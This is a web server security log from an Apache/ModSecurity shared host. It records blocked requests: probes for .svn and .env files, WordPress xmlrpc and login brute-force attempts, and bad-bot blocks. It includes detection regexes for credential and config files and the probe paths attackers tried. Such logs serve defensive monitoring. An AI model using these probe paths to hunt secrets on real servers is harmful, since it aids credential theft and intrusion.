[Tue May 26 16:37:51.648103 2026] [security2:error] [pid 817651:tid 817853] [client 195.178.110.34:0] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.digitalgerminate.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahV_B9lGRCPPN1dS2y2VkgAAAM0"]
[Tue May 26 16:37:51.956405 2026] [security2:error] [pid 817651:tid 817782] [client 117.198.37.168:63197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_B9lGRCPPN1dS2y2VngAAAIY"]
[Tue May 26 16:37:51.956521 2026] [security2:error] [pid 817651:tid 817782] [client 117.198.37.168:63197] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_B9lGRCPPN1dS2y2VngAAAIY"]
[Tue May 26 16:37:52.864263 2026] [security2:error] [pid 817651:tid 817886] [client 195.178.110.34:0] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.digitalgerminate.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahV_CNlGRCPPN1dS2y2VtgAAAO4"]
[Tue May 26 16:37:53.000930 2026] [security2:error] [pid 817651:tid 817890] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_B9lGRCPPN1dS2y2VmQAAAPI"]
[Tue May 26 16:37:55.585634 2026] [security2:error] [pid 817651:tid 817804] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_CdlGRCPPN1dS2y2V2AAAAJw"]
[Tue May 26 16:37:57.247784 2026] [security2:error] [pid 817651:tid 817907] [client 195.178.110.34:0] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.digitalgerminate.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahV_DdlGRCPPN1dS2y2WLwAAAQM"]
[Tue May 26 16:37:57.408920 2026] [security2:error] [pid 817651:tid 817796] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_C9lGRCPPN1dS2y2WAAAAAJQ"]
[Tue May 26 16:37:59.230067 2026] [security2:error] [pid 817651:tid 817818] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_DdlGRCPPN1dS2y2WOwAAAKo"]
[Tue May 26 16:38:00.926227 2026] [security2:error] [pid 817651:tid 817796] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_D9lGRCPPN1dS2y2WYAAAAJQ"]
[Tue May 26 16:38:02.256543 2026] [security2:error] [pid 817651:tid 817829] [client 117.198.37.168:63502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_EtlGRCPPN1dS2y2WzQAAALU"]
[Tue May 26 16:38:02.256686 2026] [security2:error] [pid 817651:tid 817829] [client 117.198.37.168:63502] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_EtlGRCPPN1dS2y2WzQAAALU"]
[Tue May 26 16:38:02.860739 2026] [security2:error] [pid 817651:tid 817827] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_EdlGRCPPN1dS2y2WoQAAALM"]
[Tue May 26 16:38:03.968748 2026] [security2:error] [pid 817651:tid 817806] [client 114.119.155.228:56977] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV_E9lGRCPPN1dS2y2W9gAAAJ4"], referer: http://haddingtonwines.com/cart?remove_item=4a71e49f6bda0c9b7642f39f1aa1f567
[Tue May 26 16:38:05.324134 2026] [security2:error] [pid 817651:tid 817808] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_E9lGRCPPN1dS2y2W8QAAAKA"]
[Tue May 26 16:38:07.142605 2026] [security2:error] [pid 817651:tid 817866] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_FdlGRCPPN1dS2y2XKAAAANo"]
[Tue May 26 16:38:09.133669 2026] [security2:error] [pid 817651:tid 817828] [client 128.140.106.114:42952] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV_GdlGRCPPN1dS2y2XhQAAALQ"], referer: http://ucdc.co.in/
[Tue May 26 16:38:09.672468 2026] [security2:error] [pid 817651:tid 817845] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_F9lGRCPPN1dS2y2XZwAAAMU"]
[Tue May 26 16:38:10.876450 2026] [security2:error] [pid 817651:tid 817790] [client 107.148.177.46:60616] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV_GtlGRCPPN1dS2y2XmwAAAI4"], referer: https://www.cagmedya.com/
[Tue May 26 16:38:11.383733 2026] [security2:error] [pid 817651:tid 817898] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_GdlGRCPPN1dS2y2XiwAAAPo"]
[Tue May 26 16:38:12.773667 2026] [security2:error] [pid 817651:tid 817908] [client 117.198.37.168:63808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_HNlGRCPPN1dS2y2X0AAAAQQ"]
[Tue May 26 16:38:12.773803 2026] [security2:error] [pid 817651:tid 817908] [client 117.198.37.168:63808] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_HNlGRCPPN1dS2y2X0AAAAQQ"]
[Tue May 26 16:38:14.188543 2026] [security2:error] [pid 817651:tid 817893] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_HNlGRCPPN1dS2y2XywAAAPU"]
[Tue May 26 16:38:14.827363 2026] [security2:error] [pid 817651:tid 817838] [client 130.254.112.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_HtlGRCPPN1dS2y2YAwAAAL4"], referer: https://www.anujtradingco.com/
[Tue May 26 16:38:16.061897 2026] [security2:error] [pid 817651:tid 817876] [client 130.254.112.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_H9lGRCPPN1dS2y2YHAAAAOQ"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1243563&moderation-hash=8c199ef7aa7ab63174b0ada074d3c667
[Tue May 26 16:38:17.028134 2026] [security2:error] [pid 817651:tid 817799] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_HtlGRCPPN1dS2y2X9gAAAJc"]
[Tue May 26 16:38:17.311789 2026] [autoindex:error] [pid 817651:tid 817900] [client 91.224.92.120:50216] AH01276: Cannot serve directory /home1/freshrlj/docmanservices.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 16:38:18.235661 2026] [security2:error] [pid 817651:tid 817693] [remote 111.229.10.83:38428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.10.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahV_ItlGRCPPN1dS2y2YSgAAoSk"]
[Tue May 26 16:38:19.849154 2026] [security2:error] [pid 817651:tid 817870] [client 195.178.110.34:32804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahV_I9lGRCPPN1dS2y2YbgAAAN4"]
[Tue May 26 16:38:19.870146 2026] [security2:error] [pid 817651:tid 817851] [client 130.254.112.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_I9lGRCPPN1dS2y2YbQAAAMs"], referer: https://anujtradingco.com
[Tue May 26 16:38:20.252801 2026] [security2:error] [pid 817651:tid 817902] [client 34.1.45.93:38416] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "shirdisaibabatemple.org"] [uri "/index.php"] [unique_id "ahV_JNlGRCPPN1dS2y2YgAAAAP4"]
[Tue May 26 16:38:20.506721 2026] [security2:error] [pid 817651:tid 817840] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_ItlGRCPPN1dS2y2YSwAAAMA"]
[Tue May 26 16:38:20.988739 2026] [security2:error] [pid 817651:tid 817838] [client 34.1.45.93:38426] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "shirdisaibabatemple.org"] [uri "/cgi-sys/404.html"] [unique_id "ahV_JNlGRCPPN1dS2y2YjgAAAL4"]
[Tue May 26 16:38:21.453396 2026] [security2:error] [pid 817651:tid 817891] [client 34.1.45.93:38426] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "shirdisaibabatemple.org"] [uri "/cgi-sys/404.html"] [unique_id "ahV_JdlGRCPPN1dS2y2YlgAAAPM"]
[Tue May 26 16:38:21.815782 2026] [security2:error] [pid 817651:tid 817897] [client 34.1.45.93:38434] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "shirdisaibabatemple.org"] [uri "/cgi-sys/404.html"] [unique_id "ahV_JdlGRCPPN1dS2y2YnwAAAPk"]
[Tue May 26 16:38:22.132216 2026] [security2:error] [pid 817651:tid 817809] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_I9lGRCPPN1dS2y2YcgAAAKE"]
[Tue May 26 16:38:22.655912 2026] [security2:error] [pid 817651:tid 817807] [client 34.1.45.93:38426] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "shirdisaibabatemple.org"] [uri "/cgi-sys/404.html"] [unique_id "ahV_JtlGRCPPN1dS2y2YowAAAJ8"]
[Tue May 26 16:38:22.989662 2026] [security2:error] [pid 817651:tid 817864] [client 117.198.37.168:64118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_JtlGRCPPN1dS2y2YqwAAANg"]
[Tue May 26 16:38:22.989791 2026] [security2:error] [pid 817651:tid 817864] [client 117.198.37.168:64118] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_JtlGRCPPN1dS2y2YqwAAANg"]
[Tue May 26 16:38:23.322471 2026] [security2:error] [pid 817651:tid 817803] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_JNlGRCPPN1dS2y2YhgAAAJs"]
[Tue May 26 16:38:23.390520 2026] [security2:error] [pid 817651:tid 817840] [client 34.1.45.93:38442] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "shirdisaibabatemple.org"] [uri "/cgi-sys/404.html"] [unique_id "ahV_J9lGRCPPN1dS2y2YtwAAAMA"]
[Tue May 26 16:38:24.362943 2026] [security2:error] [pid 817651:tid 817830] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_JtlGRCPPN1dS2y2YogAAALY"]
[Tue May 26 16:38:26.368177 2026] [security2:error] [pid 817651:tid 817824] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_KNlGRCPPN1dS2y2YwQAAALA"]
[Tue May 26 16:38:28.219949 2026] [security2:error] [pid 817651:tid 817833] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_KtlGRCPPN1dS2y2Y7AAAALk"]
[Tue May 26 16:38:28.618185 2026] [security2:error] [pid 817651:tid 817785] [client 109.155.26.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_KtlGRCPPN1dS2y2Y8gAAAIk"]
[Tue May 26 16:38:30.487696 2026] [security2:error] [pid 817651:tid 817888] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_LNlGRCPPN1dS2y2ZEwAAAPA"]
[Tue May 26 16:38:32.214078 2026] [security2:error] [pid 817651:tid 817896] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_LtlGRCPPN1dS2y2ZPgAAAPg"]
[Tue May 26 16:38:33.517211 2026] [security2:error] [pid 817651:tid 817835] [client 117.198.37.168:64423] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_MdlGRCPPN1dS2y2ZjQAAALs"]
[Tue May 26 16:38:33.517343 2026] [security2:error] [pid 817651:tid 817835] [client 117.198.37.168:64423] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_MdlGRCPPN1dS2y2ZjQAAALs"]
[Tue May 26 16:38:34.507100 2026] [security2:error] [pid 817651:tid 817808] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_MNlGRCPPN1dS2y2ZcwAAAKA"]
[Tue May 26 16:38:36.226887 2026] [core:crit] [pid 817651:tid 817799] (13)Permission denied: [client 52.167.144.54:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:38:36.314739 2026] [core:crit] [pid 817651:tid 817885] (13)Permission denied: [client 52.167.144.54:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:38:36.629772 2026] [security2:error] [pid 817651:tid 817807] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_MtlGRCPPN1dS2y2ZnAAAAJ8"]
[Tue May 26 16:38:37.827735 2026] [core:crit] [pid 817651:tid 817808] (13)Permission denied: [client 40.77.167.62:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:38:37.981408 2026] [core:crit] [pid 817651:tid 817885] (13)Permission denied: [client 40.77.167.62:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:38:39.036054 2026] [security2:error] [pid 817651:tid 817846] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_M9lGRCPPN1dS2y2Z0AAAAMY"]
[Tue May 26 16:38:40.858331 2026] [security2:error] [pid 817651:tid 817881] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_NdlGRCPPN1dS2y2Z-gAAAOk"]
[Tue May 26 16:38:41.555975 2026] [security2:error] [pid 817651:tid 817831] [client 185.191.171.6:28838] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahV_OdlGRCPPN1dS2y2aZwAAALc"]
[Tue May 26 16:38:41.556067 2026] [security2:error] [pid 817651:tid 817831] [client 185.191.171.6:28838] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahV_OdlGRCPPN1dS2y2aZwAAALc"]
[Tue May 26 16:38:42.282017 2026] [security2:error] [pid 817651:tid 817908] [client 125.235.231.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_N9lGRCPPN1dS2y2aJQAAAQQ"]
[Tue May 26 16:38:42.557976 2026] [security2:error] [pid 817651:tid 817900] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_N9lGRCPPN1dS2y2aNAAAAPw"]
[Tue May 26 16:38:42.880510 2026] [core:crit] [pid 817651:tid 817815] (13)Permission denied: [client 207.46.13.126:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:38:43.578223 2026] [core:crit] [pid 817651:tid 817803] (13)Permission denied: [client 207.46.13.126:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:38:43.947094 2026] [security2:error] [pid 817651:tid 817883] [client 117.198.37.168:64725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_O9lGRCPPN1dS2y2akQAAAOs"]
